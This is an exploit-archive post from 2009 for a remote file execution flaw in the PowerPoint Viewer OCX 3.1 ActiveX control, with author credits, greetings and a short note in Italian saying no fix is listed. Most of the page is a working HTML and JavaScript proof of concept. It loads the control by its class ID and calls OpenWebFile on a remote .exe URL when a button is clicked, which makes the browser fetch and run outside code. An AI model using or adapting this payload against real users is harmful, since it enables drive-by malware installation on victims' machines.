PowerPoint Viewer OCX 3.1 Remote File Execution Exploit

2009-01-13 19:04:42

PowerPoint Viewer OCX v3.1 Remote File Execution Exploit

Founded By : Cyber-Zone
E-mail : [email protected]
Home : WwW.Exploiter5.CoM
GreetZ : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum



<HTML>
<BODY>
<object id=Cyb classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>

<SCRIPT>

function Do_it()
{
File = "http://test.com/file.exe"
Cyb.OpenWebFile(File)
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.